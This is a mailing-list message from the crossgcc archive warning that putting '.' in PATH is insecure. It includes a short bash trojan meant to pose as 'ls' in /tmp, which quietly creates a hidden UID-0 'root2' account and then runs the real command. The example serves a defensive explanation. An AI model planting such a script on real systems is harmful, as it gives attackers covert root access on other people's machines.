This is the mail archive of the crossgcc@sourceware.org mailing list for the crossgcc project.
See the CrossGCC FAQ for lots more information.
| Index Nav: | [Date Index] [Subject Index] [Author Index] [Thread Index] | |
|---|---|---|
| Message Nav: | [Date Prev] [Date Next] | [Thread Prev] [Thread Next] |
| Other format: | [Raw text] | |
Arnaud, Johannes, All,
On Friday 30 July 2010 033627 Arnaud Lacombe wrote:
> Having the current directory in PATH is perfectly valid, said POSIX.
> There is no foot shooting involved, just imperfect software behaving
> badly on corner cases.
Perfectly valid, syntax wide, yes. I guess that it's not what Johannes
implied by "shoot themselves in the foot and deserve it".
Having . in the PATH is broken, security wise. For example, take a malicious
user that has access to /tmp and puts a script shell there that he names
'ls'. The first user to enter /tmp will, depending on the order in PATH, run
this script instead of the real 'ls'. Pwned.
For example, I'd do smthg like that (very simple):
#! /bin/bash
useradd -u 0 -g 0 -p "passwd_hash" -s /bin/sh root2 >/dev/null 2>&1
PATH="${PATH//.:}"
export PATH="${PATH//:.}"
exec "${0}" "${@}"
. in the PATH is borked. Do not use . in your PATH.
Regards,
Yann E. MORIN.
--
.-----------------.--------------------.------------------.--------------------.
| Yann E. MORIN | Real-Time Embedded | /"\ ASCII RIBBON | Erics' conspiracy: |
| +0/33 662376056 | Software Designer | \ / CAMPAIGN | ^ |
| --==< O_o >==-- '------------.-------: X AGAINST | /e\ There is no |
| http://ymorin.is-a-geek.org/ | (*_*) | / \ HTML MAIL | """ conspiracy. |
'------------------------------'-------'------------------'--------------------'
--
For unsubscribe information see http://sourceware.org/lists.html#faq
| Index Nav: | [Date Index] [Subject Index] [Author Index] [Thread Index] | |
|---|---|---|
| Message Nav: | [Date Prev] [Date Next] | [Thread Prev] [Thread Next] |